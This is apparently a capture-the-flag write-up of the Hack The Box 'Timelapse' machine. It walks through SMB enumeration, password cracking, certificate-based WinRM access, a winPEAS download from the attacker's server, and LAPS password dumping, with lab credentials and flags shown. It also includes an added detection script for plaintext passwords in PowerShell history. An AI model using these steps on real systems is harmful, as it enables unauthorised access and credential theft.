Hackthebox - Timelapse

Machine information

Machine type

Information gathering

Nmap

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.152
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-29 02:18 EDT
Nmap scan report for 10.10.11.152
Host is up (0.55s latency).
Not shown: 65525 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-29 14:19:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-03-29T14:21:28+00:00; +7h59m58s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
49674/tcp open  msrpc         Microsoft Windows RPC
51354/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-03-29T14:20:18
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   556.15 ms 10.10.16.1
2   556.22 ms 10.10.11.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.57 seconds

SMB

This machine clearly exposes SMB, so first check the guest user's access

enum4linux -a -u "guest" -p "" 10.10.11.152

[+] Attempting to map shares on 10.10.11.152
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/ADMIN$   Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/C$       Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/IPC$     [E] Can't understand response:
NT_STATUS_INVALID_INFO_CLASS listing \*
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/NETLOGON Mapping: OK     Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/Shares   Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/SYSVOL   Mapping: OK     Listing: DENIED

The Shares folder is readable, so let's see what is inside

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# smbclient -U "guest" //10.10.11.152/Shares 
Enter WORKGROUP\guest's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 2323752 blocks available

There are two folders; check each one in turn

smb: \> cd Dev
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 2323752 blocks available

The Dev directory contains an archive named winrm_backup.zip; download it and take a look

smb: \Dev\> get winrm_backup.zip 
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)

John

The download finished; take a look at the file

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:

The archive needs a password, which we do not have, so try cracking it with john

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# zip2john winrm_backup.zip > hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: 2b chk, TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash    
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-03-29 21:46) 3.333g/s 11578Kp/s 11578Kc/s 11578KC/s surfroxy154..supergay01
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The archive password is supremelegacy; extract the archive

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx

Exploitation

Extraction yields a pfx file. A quick search shows that openssl can extract the private key from a pfx, so extract it

https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
Enter Import Password:
Mac verify error: invalid password?

The extraction also asks for a password, and the password just cracked for the zip does not work, so crack this one as well

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# pfx2john legacyy_dev_auth.pfx > hashbis 

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashbis 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:01:58 DONE (2022-03-29 21:53) 0.008414g/s 27189p/s 27189c/s 27189C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Cracking gives the password thuglegacy; now run the extraction again

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -out prv.key          
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
Enter Import Password:

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# ls
cert.crt  hash  hashbis  legacyy_dev_auth.pfx  nmap  prv.key  winrm_backup.zip

Use evil-winrm for the exploitation step

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key -p -u

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

Successfully obtained user-level access

*Evil-WinRM* PS C:\Users\legacyy\Documents> type 'C:\Users\legacyy\Desktop\user.txt'
622218eb92f1c85ad186d6aee0dbdb53

Successfully obtained the user flag file

Privilege escalation

Start an HTTP server locally

┌──(root💀kali)-[~/Desktop]
└─# python3 -m http.server 80                                    
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Use powershell to download our local winPEAS.exe privilege-escalation helper

powershell "Invoke-WebRequest -UseBasicParsing 10.10.16.4/winPEASx64.exe -OutFile winPEASx64.exe"

Then run it

*Evil-WinRM* PS C:\Users\legacyy\Documents> powershell "Invoke-WebRequest -UseBasicParsing 10.10.16.4/winPEASx64.exe -OutFile winPEASx64.exe"
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
╔══════════╣ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 434B

This reveals a file containing the command history; download it

download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Then view it

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# cat ConsoleHost_history.txt                                                                         
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
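
An added example, not part of the original write-up: a defender-side scan of PSReadLine history text for the pattern visible above, where a password literal is passed to ConvertTo-SecureString -AsPlainText and TLS checks are switched off. The sample history, its placeholder password, the DEPLOY_PW variable and all function and rule names are constructed for this example.

```python
import re

# Constructed sample modelled on the history file above; the password and the
# DEPLOY_PW variable are placeholders invented for this example.
SAMPLE_HISTORY = """\
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'EXAMPLE-PLACEHOLDER-PW' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
$t = ConvertTo-SecureString $env:DEPLOY_PW -AsPlainText -Force
exit
"""

SECURESTRING = re.compile(r"ConvertTo-SecureString\b(?P<args>.*)", re.I)
AS_PLAINTEXT = re.compile(r"-AsPlainText\b", re.I)
QUOTED = re.compile(r"(['\"])(.+?)\1")
PSCRED_USER = re.compile(r"PSCredential\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
SKIP_TLS = re.compile(r"-Skip(?:CACheck|CNCheck|RevocationCheck)\b", re.I)


def scan_history(text):
    """Return (line_no, rule, redacted_line) for each risky history line."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = SECURESTRING.search(line)
        if m and AS_PLAINTEXT.search(m.group("args")):
            literal = QUOTED.search(m.group("args"))
            if literal:  # quoted literal: the secret itself is on disk
                redacted = line.replace(literal.group(2), "<redacted>")
                findings.append((no, "plaintext-securestring", redacted))
        user = PSCRED_USER.search(line)
        if user:  # tells the responder which account to rotate
            findings.append((no, "credential-for:" + user.group(1), line))
        if SKIP_TLS.search(line):
            findings.append((no, "tls-validation-disabled", line))
    return findings


if __name__ == "__main__":
    for no, rule, shown in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {rule}: {shown}")
```

Run it over the contents of each user's ConsoleHost_history.txt at the PSReadLine path winPEAS reported above. The line that reads the secret from a variable is deliberately not flagged, because no secret is stored in the file.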

The history contains the svc_deploy credentials; try using them with laps.py

https://github.com/n00py/LAPSDumper/blob/main/laps.py

First add a local DNS entry

echo 10.10.11.152 timelapse.htb >> /etc/hosts

Then run it

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# python3 laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
DC01$:C9(3OIh923TK13J.iADjN))A

This yields a password

Log in with evil-winrm again

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# evil-winrm -i 10.10.11.152 -S -u Administrator -p 'C9(3OIh923TK13J.iADjN))A' 

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator

Successfully obtained administrator access

*Evil-WinRM* PS C:\users\TRX\Desktop> cat root.txt
365b8463a586a128c09558558d4deceb

Successfully obtained the root flag file